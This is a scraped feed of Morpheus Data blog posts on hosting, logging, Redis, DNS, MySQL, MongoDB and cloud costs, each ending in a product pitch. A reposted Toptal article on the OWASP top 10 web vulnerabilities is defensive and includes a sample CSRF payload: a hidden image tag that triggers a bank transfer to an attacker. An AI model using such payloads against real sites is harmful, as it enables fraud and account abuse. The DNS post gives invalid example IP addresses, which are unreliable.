Dedicated servers will never be cheap, at least not compared to shared and VPS plans. However, they are getting cheaper, and they could get a boost in the form of frugal and inexpensive ARM hardware. ARM-based processors tend to offer superior efficiency compared to x86 processors, yet they are relatively cheap to develop and deploy. Some flagship smartphones ship with quad-core chips, based on 64-bit Cortex-A57 CPU cores, and the same cores are coming to ARM-based server processors.

As a chip geek, I could go on, but we intend to take an in-depth look at the emerging field of ARM servers in one of our upcoming blog posts, so if you’re interested, stay tuned.

This article originally appeared in Toptal link at https://www.toptal.com/it/hosting-for-freelance-developers-paas

To try out Morpheus' leading PaaS offering sign up for a free demo here.

↧

What is Data Logging

April 8, 2016, 5:43 pm

≫ Next: The Good, the Bad, and the Ugly Among Redis Pagination Strategies

≪ Previous: Hosting For Freelance Developers: PaaS, VPS, Cloud, And More

Data logging is one of the most important aspects of most IT pros. So, do you know what it is?

Data logging is often talked about as a helpful tool that you can use when trying to maintain your various servers, databases, and other systems that go into an application. So, what is data logging and what does it do that helps you maintain your applications more easily?

Data Logging Defined Generally speaking, data logging is the recording of data over a period of time by a computer system or a special standalone device which can be tailored to a specific use case. The recorded data can then be retrieved and analyzed to help determine if things ran smoothly during the time the data was being recording, and to help identify what happened if there were any issues that would be in need or further attention. Standalone data loggers are used in many familiar environments to gather information such as weather conditions, traffic conditions, wildlife research, and many others. These devices make it possible for the recording of data to take place 24/7 and automatically, without the need for a person to be present with the data logger.

A data logger for a weather station. Source: Wikipedia.

For instance, when performing wildlife research, it can be beneficial to have such automated logging, as wildlife may behave differently when one or more humans are present. For the purposes of application monitoring, data logging records information pertinent to the maintenance of the infrastructure that is required for an application to run.

How Data Logging Helps With App Maintenance When maintaining apps, it is always helpful to know when and where something went wrong. In many cases, such logging can help you avoid problems by alerting you that an issue may arise soon (a server beginning to respond slowly, for instance). Data logging can also help you keep track of statistics over time, such as the overall uptime, the uptime of specific servers, average response time, and other data that can help you tweak your applications for optimum uptime and performance.

Morpheus and Monitoring

If you are looking for a monitoring system with excellent data logging and analysis reports, you should give Morpheus a try. With Morpheus, data logging is automatic as you provision servers and apps. Using the available tools, you can monitor the various parts of your system to keep track of uptime, response time, and to be alerted if an issue does arise.

The Morpheus interface is clean and easy to use. Source: Morpheus.

Morpheus also allows you to provision apps in a single click and provides ease of use for developers with APIs and a CLI. In addition, backups are also automatic, and you can have redundancy as needed to avoid potentially long waits for disaster recovery to take place. Sign up for a demo and we'll let you try out Morpheus for free today.

↧

The Good, the Bad, and the Ugly Among Redis Pagination Strategies

April 8, 2016, 5:43 pm

≫ Next: Using DNS to Debug Downtime

≪ Previous: What is Data Logging

If you need to use pagination in your Redis app, there are a couple of strategies you can use to achieve the necessary functionality. While pagination can be challenging, a quick overview of each of these techniques should be helpful in making your job of choosing a method and implementing it a little easier. There are several strategies for pagination in Redis. Find out what they are and the pros and cons of each!

In Redis, you have a couple of options from which to choose. You can use the SSCAN command or you can use sorted sets. Each of these has their own advantages, so choose the one that works best for your application and its infrastructure.

Using the SSCAN Command

The SSCAN command is part of a group of commands similar to the regular SCAN command. These include:

SCAN - Used to iterate over the set of keys in the current database.
SSCAN - Used to iterate over elements of sets.
HSCAN - Used to iterate fields hashes and associated values.
ZSCAN - Used to iterate elements of sorted sets and their scores.

Example of scan iteration. Source: Redis.

So, while the regular SCAN command iterates over the database keys, the SSCAN command can iterate over elements of sets. By using the returned SSCAN cursor, you could paginate over a Redis set.

The downside is that you need some way to persist the value of the cursor, and if there are concurrent users this could lead to some odd behavior, since the cursor may not be where it is expected. However, this can be useful for applications where traffic to these paginated areas may be lighter.

Using Sorted Sets

In Redis, sorted sets are a non-repeating collection of strings associated with a score. This score is used to order the set from the smallest to the largest score. This data type allows for fast updating by giving you easy access to elements, even if the elements are in the middle of the set.

An example of sorted set elements Source: Redis.

To paginate, you can use the ZRANGE command to select a range of elements in a sorted set based on their scores. So, you could, for example, select scores from 1-20, 21-40, and so on. By programmatically adjusting the range as the user moves through the data, you can achieve the pagination you need for your application.

Since sorted sets and ZRANGE do this task more intuitively than using a scan, it is often the preferred method of pagination, and is easier to implement with multiple users, since you can programmatically keep track of which ZRANGE each user is selecting at any given time.

In the end, you can choose which method works for your particular situation. If you have a smaller application with less traffic, a scan may work for you. If; however, you need a more robust solution for larger data sets or more highly utilized applications, it may be best to go ahead and use ZRANGE with sorted sets to achieve pagination in your application.

↧

Using DNS to Debug Downtime

April 8, 2016, 5:43 pm

≫ Next: 10 Most Common Web Security Vulnerabilities

≪ Previous: The Good, the Bad, and the Ugly Among Redis Pagination Strategies

At times, a web app or web site may appear to be down when the server it is on appears to be functioning properly. When this happens, it is important to know where the issue resides, as it may be easy to fix, or may require a lot of work or contacting others. One of the possibilities when a site is in this state is whether or not the DNS server is up to date and pointing others to the proper server in order to load your site or app.

What is DNS?
DNS stands for Domain Name System. It is the tool that allows a typical URL, such as http://gomorpheus.com , to point to the server on which the actual web site or app resides. Once a computer finds the DNS information it needs for mapping a base URL to a server address, it will remember it for a period of time, until its TTL (Time To Live) has been reached.

How DNS can contribute to downtime

DNS can contribute to downtime in several ways:

The DNS server has the wrong information stored about the server to which the domain should be pointed. For example, the server is actually at the IP address 204.268.130.100, but the DNS entry has the server at 204.268.120.100. Here, changing the entry to the proper address will fix the situation.
The DNS server is down. In such a case, computers that do not have the DNS information cached cannot reach the DNS server to look up the proper address. This will require getting your DNS server back up and running, or contacting the proper people to do this if it is not your server.
The changes haven’t propagated and updated caches yet. Since computers cache DNS information in the operating system and browser, this could be the case.

If the user is affected by number three above, there are a couple of things to try:

Have the user close the web browser, reopen it, and try again. Browsers have a tendency to cache DNS information, so this may solve the issue.
Have the user clear the DNS cache on their operating system. This can be done from a shell, for example, the commands to do this in Windows and OSX are shown below:

#Windows:

ipconfig /flushdns

#OSX:
sudo killall -HUP mDNSResponder

Examples of clearing the DNS cache

Monitoring with Morpheus

Do you want to be notified when your site or app is having issues? If you are looking for a monitoring system with excellent data logging and analysis reports, you should give Morpheus a try. With Morpheus, data logging is automatic as you provision servers and apps. Using the available tools, you can monitor the various parts of your system to keep track of uptime, response time, and to be alerted if an issue does arise.

The Morpheus interface is clean and easy to use.

Morpheus allows you to provision apps in a single click, and provides ease of use for developers with APIs and a CLI. In addition, backups are also automatic, and you can have redundancy as needed to avoid potentially long waits for disaster recovery to take place. So, why not register an account or try out Morpheus for free today?

↧

10 Most Common Web Security Vulnerabilities

April 8, 2016, 5:43 pm

≫ Next: How to Manage App Uptime Like a Boss

≪ Previous: Using DNS to Debug Downtime

By Gergely Kalman, Security Specialist at Toptal

For all too many companies, it’s not until after a breach has occurred that web security becomes a priority. During my years working as an IT Security professional, I have seen time and time again how obscure the world of IT Security is to so many of my fellow programmers.

An effective approach to IT security must, by definition, be proactive and defensive. Toward that end, this post is aimed at sparking a security mindset, hopefully injecting the reader with a healthy dose of paranoia.

In particular, this guide focuses on 10 common and significant web security pitfalls to be aware of, including recommendations on how they can be avoided. The focus is on the Top 10 Web Vulnerabilities identified by the Open Web Application Security Project (OWASP), an international, non-profit organization whose goal is to improve software security across the globe.

A little web security primer before we start – authentication and authorization

When speaking with other programmers and IT professionals, I often encounter confusion regarding the distinction between authorization and authentication. And of course, the fact the abbreviation auth is often used for both helps aggravate this common confusion. This confusion is so common that maybe this issue should be included in this post as “Common Web Vulnerability Zero”.

So before we proceed, let’s clearly the distinction between these two terms:

Authentication: Verifying that a person is (or at least appears to be) a specific user, since he/she has correctly provided their security credentials (password, answers to security questions, fingerprint scan, etc.).
Authorization: Confirming that a particular user has access to a specific resource or is granted permission to perform a particular action.

Stated another way, authentication is knowing who an entity is, while authorization is knowing what a given entity can do.

Common Mistake #1: Injection flaws

Injection flaws result from a classic failure to filter untrusted input. It can happen when you pass unfiltered data to the SQL server (SQL injection), to the browser (XSS – we’ll talk about this later), to the LDAP server (LDAP injection), or anywhere else. The problem here is that the attacker can inject commands to these entities, resulting in loss of data and hijacking clients’ browsers.

Anything that your application receives from untrusted sources must be filtered, preferably according to a whitelist. You should almost never use a blacklist, as getting that right is very hard and usually easy to bypass. Antivirus software products typically provide stellar examples of failing blacklists. Pattern matching does not work.

Prevention: The good news is that protecting against injection is “simply” a matter of filtering your input properly and thinking about whether an input can be trusted. But the bad news is that all input needs to be properly filtered, unless it can unquestionably be trusted (but the saying “never say never” does come to mind here).

In a system with 1,000 inputs, for example, successfully filtering 999 of them is not sufficient, as this still leaves one field that can serve as the Achilles heal to bring down your system. And you might think that putting an SQL query result into another query is a good idea, as the database is trusted, but if the perimeter is not, the input comes indirectly from guys with malintent. This is called Second Order SQL Injection in case you’re interested.

Since filtering is pretty hard to do right (like crypto), what I usually advise is to rely on your framework’s filtering functions: they are proven to work and are thoroughly scrutinized. If you do not use frameworks, you really need to think hard about whether not using them really makes sense in your environment. 99% of the time it does not.

Common Mistake #2: Broken Authentication

This is a collection of multiple problems that might occur during broken authentication, but they don’t all stem from the same root cause.

Assuming that anyone still wants to roll their own authentication code in 2014 (what are you thinking??), I advise against it. It is extremely hard to get right, and there are a myriad of possible pitfalls, just to mention a few:

The URL might contain the session id and leak it in the referer header to someone else.
The passwords might not be encrypted either in storage or transit.
The session ids might be predictable, thus gaining access is trivial.
Session fixation might be possible.
Session hijacking might be possible, timeouts not implemented right or using HTTP (no SSL), etc…

Prevention: The most straightforward way to avoid this web security vulnerability is to use a framework. You might be able to implement this correctly, but the former is much easier. In case you do want to roll your own code, be extremely paranoid and educate yourself on what the pitfalls are. There are quite a few.

Common Mistake #3: Cross Site Scripting (XSS)

This is a fairly widespread input sanitization failure (essentially a special case of common mistake #1). An attacker gives your web application JavaScript tags on input. When this input is returned to the user unsanitized, the user’s browser will execute it. It can be as simple as crafting a link and persuading a user to click it, or it can be something much more sinister. On page load the script runs and, for example, can be used to post your cookies to the attacker.

Prevention: There’s a simple web security solution: don’t return HTML tags to the client. This has the added benefit of defending against HTML injection, a similar attack whereby the attacker injects plain HTML content (such as images or loud invisible flash players) – not high-impact but surely annoying (“please make it stop!”). Usually, the workaround is simply converting all HTML entities, so that script is returned as <script>. The other often employed method of sanitization is using regular expressions to strip away HTML tags using regular expressions on < and > , but this is dangerous as a lot of browsers will interpret severely broken HTML just fine. Better to convert all characters to their escaped counterparts.

Related: How Did MongoDB Get It's Name

Common Mistake #4: Insecure Direct Object References

This is a classic case of trusting user input and paying the price in a resulting security vulnerability. A direct object reference means that an internal object such as a file or database key is exposed to the user. The problem with this is that the attacker can provide this reference and, if authorization is either not enforced (or is broken), the attacker can access or do things that they should be precluded from.

For example, the code has a download.php module that reads and lets the user download files, using a CGI parameter to specify the file name (e.g.download.php?file=something.txt). Either by mistake or due to laziness, the developer omitted authorization from the code. The attacker can now use this to download any system files that the user running PHP has access to, like the application code itself or other data left lying around on the server, like backups. Uh-oh.

Another common vulnerability example is a password reset function that relies on user input to determine whose password we’re resetting. After clicking the valid URL, an attacker can just modify the usernamefield in the URL to say something like “admin”.

Incidentally, both of these examples are things I myself have seen appearing often “in the wild”.

Prevention: Perform user authorization properly and consistently, and whitelist the choices. More often than not though, the whole problem can be avoided by storing data internally and not relying on it being passed from the client via CGI parameters. Session variables in most frameworks are well suited for this purpose.

Common Mistake #5: Security misconfiguration

In my experience, web servers and applications that have been misconfigured are way more common than those that have been configured properly. Perhaps this because there is no shortage of ways to screw up. Some examples:

Running the application with debug enabled in production.
Having directory listing enabled on the server, which leaks valuable information.
Running outdated software (think WordPress plugins, old PhpMyAdmin).
Having unnecessary services running on the machine.
Not changing default keys and passwords. (Happens way more frequently than you’d believe!)
Revealing error handling information to the attackers, such as stack traces.

Prevention: Have a good (preferably automated) “build and deploy” process, which can run tests on deploy. The poor man’s security misconfiguration solution is post-commit hooks, to prevent the code from going out with default passwords and/or development stuff built in.

Common Mistake #6: Sensitive data exposure

This web security vulnerability is about crypto and resource protection. Sensitive data should be encrypted at all times, including in transit and at rest. No exceptions. Credit card information and user passwords should never travel or be stored unencrypted, and passwords should always be hashed. Obviously the crypto/hashing algorithm must not be a weak one – when in doubt, use AES (256 bits and up) and RSA (2048 bits and up).

And while it goes without saying that session IDs and sensitive data should not be traveling in the URLs and sensitive cookies should have the secure flag on, this is very important and cannot be over-emphasized.

Prevention:

In transit: Use HTTPS with a proper certificate and PFS (Perfect Forward Secrecy). Do not accept anything over non-HTTPS connections. Have the secure flag on cookies.
In storage: This is harder. First and foremost, you need to lower your exposure. If you don’t need sensitive data, shred it. Data you don’t have can’t be stolen. Do not store credit card information ever, as you probably don’t want to have to deal with being PCI compliant. Sign up with a payment processor such asStripe or Braintree. Second, if you have sensitive data that you actually do need, store it encrypted and make sure all passwords are hashed. For hashing, use of bcrypt is recommended. If you don’t use bcrypt, educate yourself on salting and rainbow tables.

And at the risk of stating the obvious, do not store the encryption keys next to the protected data. That’s like storing your bike with a lock that has the key in it. Protect your backups with encryption and keep your keys very private. And of course, don’t lose the keys!

Common Mistake #7: Missing function level access control

This is simply an authorization failure. It means that when a function is called on the server, proper authorization was not performed. A lot of times, developers rely on the fact that the server side generated the UI and they think that the functionality that is not supplied by the server cannot be accessed by the client. It is not as simple as that, as an attacker can always forge requests to the “hidden” functionality and will not be deterred by the fact that the UI doesn’t make this functionality easily accessible. Imagine there’s an /adminpanel, and the button is only present in the UI if the user is actually an admin. Nothing keeps an attacker from discovering this functionality and misusing it if authorization is missing.

Prevention: On the server side, authorization must always be done. Yes, always. No exceptions or vulnerabilities will result in serious problems.

Common Mistake #8: Cross Site Request Forgery (CSRF)

This is a nice example of a confused deputy attack whereby the browser is fooled by some other party into misusing its authority. A 3rd party site, for example, can make the user’s browser misuse it’s authority to do something for the attacker.

In the case of CSRF, a 3rd party site issues requests to the target site (e.g., your bank) using your browser with your cookies / session. If you are logged in on one tab on your bank’s homepage, for example, and they are vulnerable to this attack, another tab can make your browser misuse its credentials on the attacker’s behalf, resulting in the confused deputy problem. The deputy is the browser that misuses its authority (session cookies) to do something the attacker instructs it to do.

Consider this example:

Attacker Alice wants to lighten target Todd’s wallet by transfering some of his money to her. Todd’s bank is vulnerable to CSRF. To send money, Todd has to access the following URL:

http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243

After this URL is opened, a success page is presented to Todd, and the transfer is done. Alice also knows, that Todd frequently visits a site under her control at blog.aliceisawesome.com, where she places the following snippet:

img src="http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243" width="0" height="0" />

Upon visiting Alice’s website, Todd’s browser thinks that Alice links to an image, and automatically issues an HTTP GET request to fetch the “picture”, but this actually instructs Todd’s bank to transfer $1500 to Alice.

Incidentally, in addition to demonstrating the CSRF vulnerability, this example also demonstrates altering the server state with an idempotent HTTP GET request which is itself a serious vulnerability. HTTP GET requestsmust be idempotent (safe), meaning that they cannot alter the resource which is accessed. Never, ever, ever use idempotent methods to change the server state.

Fun fact: CSRF is also the method people used for cookie-stuffing in the past until affiliates got wiser.

Prevention: Store a secret token in a hidden form field which is inaccessible from the 3rd party site. You of course always have to verify this hidden field. Some sites ask for your password as well when modifying sensitive settings (like your password reminder email, for example), although I’d suspect this is there to prevent the misuse of your abandoned sessions (in an internet cafe for example).

Common Mistake #9: Using components with known vulnerabilities

The title says it all. I’d again classify this as more of a maintenance/deployment issue. Before incorporating new code, do some research, possibly some auditing. Using code that you got from a random person onGitHub or some forum might be very convenient, but is not without risk of serious web security vulnerability.

I have seen many instances, for example, where sites got owned (i.e., where an outsider gains administrative access to a system), not because the programmers were stupid, but because a 3rd party software remained unpatched for years in production. This is happening all the time with WordPress plugins for example. If you think they will not find your hidden phpmyadmininstallation, let me introduce you to dirbuster.

The lesson here is that software development does not end when the application is deployed. There has to be documentation, tests, and plans on how to maintain and keep it updated, especially if it contains 3rd party or open source components.

Prevention:

Exercise caution. Beyond obviously using caution when using such components, do not be a copy-paste coder. Carefully inspect the piece of code you are about to put into your software, as it might be broken beyond repair (or in some cases, intentionally malicious).
Stay up-to-date. Make sure you are using the latest versions of everything that you trust, and have a plan to update them regularly. At least subscribe to a newsletter of new security vulnerabilities regarding the product.

Common Mistake #10: Unvalidated redirects and forwards

This is once again an input filtering issue. Suppose that the target site has a redirect.php module that takes a URL as a GETparameter. Manipulating the parameter can create a URL on targetsite.comthat redirects the browser to malwareinstall.com. When the user sees the link, they will see targetsite.com/blahblahblahwhich the user thinks is trusted and is safe to click. Little do they know that this will actually transfer them onto a malware drop (or any other malicious) page. Alternatively, the attacker might redirect the browser to targetsite.com/deleteprofile?confirm=1.

It is worth mentioning, that stuffing unsanitized user-defined input into an HTTP header might lead to header injection which is pretty bad.

Prevention: Options include:

Don’t do redirects at all (they are seldom necessary).
Have a static list of valid locations to redirect to.
Whitelist the user-defined parameter, but this can be tricky.

Epilogue

I hope that I have managed to tickle your brain a little bit with this post and to introduce a healthy dose of paranoia and web security vulnerability awareness.

The core takeaway here is that age-old software practices exist for a reason and what applied back in the day for buffer overflows, still apply for pickled strings in Python today. Security helps you write correct(er) programs, which all programmers should aspire to.

Please use this knowledge responsibly, and don’t test pages without permission!

For more information and more specific attacks, have a look at:https://www.owasp.org/index.php/Category:Attack.

This post originally appeared in the Toptal blog: https://www.toptal.com/security/10-most-common-web-security-vulnerabilities

To see how Morpheus can help you get more out of your MongoDB sign up for a demo today!

↧

How to Manage App Uptime Like a Boss

April 8, 2016, 5:43 pm

≫ Next: "Too Many Connections": How to Increase the MySQL Connection Count To Avoid This Problem

≪ Previous: 10 Most Common Web Security Vulnerabilities

Find out how you can more easily manage your app’s uptime.

Keeping your apps up and running with a good uptime rate can be a tedious task of monitoring servers, logs, databases, and more. If an incident does occur, you have to go through piece by piece to find out where the problem is – and then work on fixing it. All of this can take precious time away from you and your staff, and increases the amount of time your app is unavailable to users while you find and fix the issue. For example, billions are being spent on election campaigns this year. If something goes down in one of these campaigns, the results can be catastrophic — the results could mean the difference between sitting in the white house and watching from home.

$4.4 billion is expected to be spent on election campaigns this year. That means managing uptime is a matter of watching from the white house or watching from home.

Average cost of downtime. Source: Disaster Recovery Journal.

Save Time with PaaS

A Platform as a Service (PaaS) can help you organize and streamline your app management, making it far easier for you and your staff to meet uptime requirements and demands. A good example of this is the Morpheus service, which makes locating and reporting on issues quick and simple.

The user-friendly Morpheus interface. Source: Morpheus

With Morpheus, you can provision apps and databases in real-time to public, private, and hybrid clouds and spin up databases, apps, environments and more with a few simple clicks. You can use the monitoring service to keep track of overall app uptime and response time, while also tracking the vital statistics for each individual piece of your app. Keep track of your database server, app server, and any other piece of your app 24/7. With all of this information at your fingertips, you may be able to prevent a number of incidents just by checking into any apps that are responding slower than usual. Being able to fix an issue before there is any outage can certainly ease the burden on you and your staff that downtime brings. Morpheus also provides automatic logging and backups of your systems. Look through easy to use reports on your systems to find out where issues occurred. For backups, you can determine the backup time and frequency to ensure you get the backups you need when you need them. Instead of worrying about whether you have a recent backup, let Morpheus ensure you have one when it is needed most! Downtime is minimized, and you get to keep your piece of mind knowing you can restore from a backup right away. In addition to all of this, Morpheus takes care of infrastructure, setup, scaling and more, and sends you alerts when your attention is needed, thus giving you more freedom to take care of other business. With all of these features, why not give

Keep track of your database server, app server, and any other piece of your app 24/7. With all of this information at your fingertips, you may be able to prevent a number of incidents just by checking into any apps that are responding slower than usual. Being able to fix an issue before there is any outage can certainly ease the burden on you and your staff that downtime brings.

Morpheus also provides automatic logging and backups of your systems. Look through easy to use reports on your systems to find out where issues occurred. For backups, you can determine the backup time and frequency to ensure you get the backups you need when you need them. Instead of worrying about whether you have a recent backup, let Morpheus ensure you have one when it is needed most! Downtime is minimized, and you get to keep your piece of mind knowing you can restore from a backup right away.

In addition to all of this, Morpheus takes care of infrastructure, setup, scaling and more, and sends you alerts when your attention is needed, thus giving you more freedom to take care of other business. With all of these features, why not give Morpheus a try today?

↧

"Too Many Connections": How to Increase the MySQL Connection Count To Avoid This Problem

April 15, 2016, 8:07 pm

≫ Next: The Fastest Way to Import Text, XML, and CSV Files into MySQL Tables

≪ Previous: How to Manage App Uptime Like a Boss

If you don't have enough connections open to your MySQL server, your users will begin to receive a "Too many connections" error while trying to use your service. To fix this, you can increase the maximum number of connections to the database that are allowed, but there are some things to take into consideration before simply ramping up this number.

Items to Consider

Before you increase the connections limit, you will want to ensure that the machine on which the database is housed can handle the additional workload. The maximum number of connections that can be supported depends on the following variables:

The available RAM – The system will need to have enough RAM to handle the additional workload.
The thread library quality of the platform - This will vary based on the platform. For example, Windows can be limited by the Posix compatibility layer it uses (though the limit no longer applies to MySQL v5.5 and up). However, there remains memoray usage concerns depending on the architecture (x86 vs. x64) and how much memory can be consumed per application process.
The required response time - Increasing the number could increase the amount of time to respond to request. This should be tested to ensure it meets your needs before going into production.
The amount of RAM used per connection - Again, RAM is important, so you will need to know if the RAM used per connection will overload the system or not.
The workload required for each connection - The workload will also factor in to what system resources are needed to handle the additional connections.

Another issue to consider is that you may also need to increase the open files limit–This may be necessary so that enough handles are available.

Checking the Connection Limit

To see what the current connection limit is, you can run the following from the MySQL command line or from many of the available MySQL tools such as phpMyAdmin:

The show variables command.

This will display a nicely formatted result for you:

Example result of the show variables command.

Increasing the Connection Limit

To increase the global number of connections temporarily, you can run the following from the command line:

An example of setting the max_connections global.

If you want to make the increase permanent, you will need to edit the my.cnf configuration file. You will need to determine the location of this file for your operating system (Linux systems often store the file in the /etc folder, for example). Open this file add a line that includes max_connections, followed by an equal sign, followed by the number you want to use, as in the following example:

Example of setting the max_connections

The next time you restart MySQL, the new setting will take effect and will remain in place unless or until this is changed again.

Easily Scale a MySQL Database

Instead of worrying about these settings on your own system, you could opt to use a service like Morpheus, which offers databases as a service on the cloud. With Morpheus, you can easily and quickly set up your choice of several databases (including MySQL, MongoDB, Redis, and Elasticsearch).

In addition, MySQL and Redis have automatic back ups, and each database instance is replicated, archived, and deployed on a high performance infrastructure with Solid State Drives. You can sign up for a free demo now to see how you can begin taking advantage of this service! Or, check out this 2-minute Morpheus Data intro video.

↧

The Fastest Way to Import Text, XML, and CSV Files into MySQL Tables

April 15, 2016, 8:07 pm

≫ Next: 3 Approaches to Creating a SQL-Join Equivalent in MongoDB

≪ Previous: "Too Many Connections": How to Increase the MySQL Connection Count To Avoid This Problem

One of the best ways to improve the performance of MySQL databases is to determine the optimal approach for importing data from other sources, such as text files, XML, and CSV files. The key is to correlate the source data with the table structure.

Data is always on the move: from a Web form to an order-processing database, from a spreadsheet to an inventory database, or from a text file to customer list. One of the most common MySQL database operations is importing data from such an external source directly into a table. Data importing is also one of the tasks most likely to create a performance bottleneck.

The basic steps entailed in importing a text file to a MySQL table are covered in a Stack Overflow post from November 2012: first, use the LOAD DATA INFILE command.

The basic MySQL commands for creating a table and importing a text file into the table. Source: Stack Overflow

Note that you may need to enable the parameter "--local-infile=1" to get the command to run. You can also specify which columns the text file loads into:

This MySQL command specifies the columns into which the text file will be imported. Source: Stack Overflow

In this example, the file's text is placed into variables "@col1, @col2, @col3," so "myid" appears in column 1, "mydecimal" appears in column 3, and column 2 has a null value.

The table resulting when LOAD DATA is run with the target column specified. Source: Stack Overflow

The fastest way to import XML files into a MySQL table

As Database Journal's Rob Gravelle explains in a March 17, 2014, article, stored procedures would appear to be the best way to import XML data into MySQL tables, but after version 5.0.7, MySQL's LOAD XML INFILE and LOAD DATA INFILE statements can't run within a Stored Procedure. There's also no way to map XML data to table structures, among other limitations.

However, you can get around most of these limitations if you can target the XML file using a rigid and known structure per proc. The example Gravelle presents uses an XML file whose rows are all contained within an file, and whose columns are represented by a named attribute:

You can use a stored procedure to import XML data into a MySQL table if you specify the table structure beforehand. Source: Database Journal

The table you're importing to has an int ID and two varchars: because the ID is the primary key, it can't have nulls or duplicate values; last_name allows duplicates but not nulls; and first_name allows up to 100 characters of nearly any data type.

The MySQL table into which the XML file will be imported has the same three fields as the file. Source: Database Journal

Gravelle's approach for overcoming MySQL's import restrictions uses the "proc-friendly" Load_File() and ExtractValue() functions.

MySQL's XML-import limitations can be overcome by using the Load_file() and ExtractValue() functions. Source: Database Journal

Benchmarking techniques for importing CSV files to MySQL tables

When he tested various ways to import a CSV file into MySQL 5.6 and 5.7, Jaime Crespo discovered a technique that he claims improves the import time for MyISAM by 262 percent to 284 percent, and for InnoDB by 171 percent to 229 percent. The results of his tests are reported in an October 8, 2014, post on Crespo's MySQL DBA for Hire blog.

Crespo's test file was more than 3GB in size and had nearly 47 million rows. One of the fastest methods in Crespo's tests was by grouping queries in a multi-insert statement, which is used by "mysqldump". Crespo also attempted to improve LOAD DATA performance by augmenting the key_cache_size and by disabling the Performance Schema.

Crespo concludes that the fastest way to load CSV data into a MySQL table without using raw files is to use LOAD DATA syntax. Also, using parallelization for InnoDB boosts import speeds.

Whether you're a CIO, IT leader or DevOps ninja, you won't find a more straightforward way to monitor your MySQL, MongoDB, Redis, and ElasticSearch databases than by using the dashboard interface of the Morpheus Data platform as a service (Paas) (check out this infographic to learn more about PaaS). Morpheus is the first and only infrastructure agnostic cloud management solution, as well as the only PaaS solution to support SQL, NoSQL, and in-memory databases.

You can provision, deploy, and host your databases from a single dashboard. The service includes a free full replica set for each database instance, as well as automatic daily backups of MySQL and Redis databases. Visit the Morpheus site to sign up for a free demo!

Watch this 2-minute intro video to see how Morpheus Data can save you time, money and sanity.

↧

3 Approaches to Creating a SQL-Join Equivalent in MongoDB

April 15, 2016, 8:07 pm

≫ Next: How to Measure the ROI of Your Cloud Spend

≪ Previous: The Fastest Way to Import Text, XML, and CSV Files into MySQL Tables

Integrating MongoDB document data with SQL and other table-centric data sources needn't be so processor-intensive.

TL;DR: While there's no such operation as a SQL-style table join in MongoDB, you can achieve the same effect without relying on table schema. Here are three techniques for combining data stored in MongoDB document collections with minimal query-processing horsepower required.

The signature relational-database operation is the table join: combine data from table 1 with data from table 2 to create table 3. The schema-less document-container structure of MongoDB and other non-relational databases makes such table joins impossible.

Instead, as the MongoDB Manual explains, MongoDB either denormalizes the data by storing related items in a single document, or it relates that data in separate documents. One way to relate documents is via manual references: the _id field of one document is saved in the other document as a reference. The application simply runs a second query to return the related data.

When you need to link multiple documents in multiple collections, DBRefs let you relate documents using the value of one document’s _id field, collection name, and, optionally, its database name. The application resolves DBRefs by running additional queries to return the referenced documents.

A tutorial in the MongoDB Manual demonstrates use of denormalization in a social-media application. The manual also provides a SQL-to-aggregation mapping chart.

Simple function for 'joining' data within a single MongoDB collection

An alternative approach to relating data in a MongoDB collection is via a function you run in the MongoDB client console. The process is explained in a Stack Overflow post from March 2014.

For example, in a library database, you first create fields for "authors", "categories", "books", and "lending".

The fields to be "joined" in the MongoDB database are "authors", "categories", "books", and "lending". Source: Stack Overflow

Then you apply the function.

Run MongoDB's find() method to retrieve related documents in a collection. Source: Stack Overflow

The result is the rough equivalent of a join operation on SQL tables.

After running the find() method the documents in the collection related as specified are returned. Source: Stack Overflow

Ensuring MongoDB apps integrate with your organization's other data

Lack of a one-to-one join equivalent is only one of the many ways MongoDB differs from SQL databases. In a July 17, 2013, post, Julian Hyde, lead developer of the Mondrian open-source OLAP engine, explains how he built a MongoDB-to-SQL interface using the Optiq dynamic data management framework.

Optiq features a SQL parser and a query optimizer powered by rewrite rules. Hyde created rules to map SQL tables onto MongoDB collections, and to map relational operations onto MongoDB's find and aggregate operators. The result is the equivalent of a JDBC driver for MongoDB based on a hybrid query-processing engine intended to shift as much query processing as possible to MongoDB. Joins and other operations are handled by the client.

The process allows you to convert each MongoDB collection to a table. The COLUMNS and TABLES system tables are supplied by Optiq, and the ZIPS view is defined in mongo-zips-model.json.

The Optiq framework allows a MongoDB collection to be converted to a SQL-style table. Source: Julian Hyde

Simple management of SQL, NoSQL, and in-memory databases is a key feature of the new Morpheus Data platform as a service (PaaS) solution. With Morpheus you can provision, deploy, and monitor heterogeneous MySQL, MongoDB, Redis, and ElasticSearch databases from a single point-and-click console. Morpheus lets you work with all your databases across public, private, and hybrid clouds in just minutes. Each database instance you create includes a free full replica set for built-in fault tolerance and fail over.

In addition, the service allows you to migrate existing databases from a private cloud to the public cloud, or from public to private. A new instance of the same database type is created in the other cloud, and real-time replication keeps the two databases in sync. Visit the Morpheus site to sign up for a demo now!

↧

How to Measure the ROI of Your Cloud Spend

April 15, 2016, 8:07 pm

≫ Next: Too Many Connections: How to Increase the MySQL Connection Count To Avoid This Problem

≪ Previous: 3 Approaches to Creating a SQL-Join Equivalent in MongoDB

Quantifying the cost of cloud ownership is no simple task.Take some of these tips to measuring the ROI of your cloud spend

Getting an accurate assessment of the total costs of public, private, and hybrid clouds requires thinking outside the invoices.

Quantifying Cloud Cost of Ownership

The big question facing organizations of all types and sizes is this: “Which is more cost-effective for hosting our apps and data, in-house or cloud?” While it may not be possible to achieve a truly apples-to-apples comparison of the two options, a careful cost accounting can be the key to achieving the optimal balance of public, private, and hybrid cloud alternatives.

If accountants ruled the world, all business decisions would come down to one number: maximum profit for the current quarter or year. In fact, basing your company’s strategy solely on short-term financial returns is one of the fastest ways to sink it. Yet so many IT decision makers look to a single magical, mystical (some would say mythical) figure when planning their tech purchases: total cost of ownership, or TCO.

Determining TCO is particularly elusive when assessing cloud alternatives to in-house development and management of an organization’s apps and data. How do you quantify accurately the benefits of faster time to market, for example? Or faster and simpler application updates? Or an IT staff that’s more engaged in its work? These are some of the questions posed by Gigaom Research’s David S. Linthicum in a May 9, 2014, article.

Linthicum points out that while tools such as Amazon Web Services’ TCO calculator, Google’s TCO Pricing Calculator, and the collection of cost calculators at The Cloud Calculator help you understand the “simple costs and benefits” of using cloud services, they exclude many of the most important aspects of the to-cloud-or-not-to-cloud decision.

The AWS TCO Calculator is intended to provide customers with an accurate cost comparison of public-cloud services vs. on-premises infrastructure. Source: AWS Official Blog

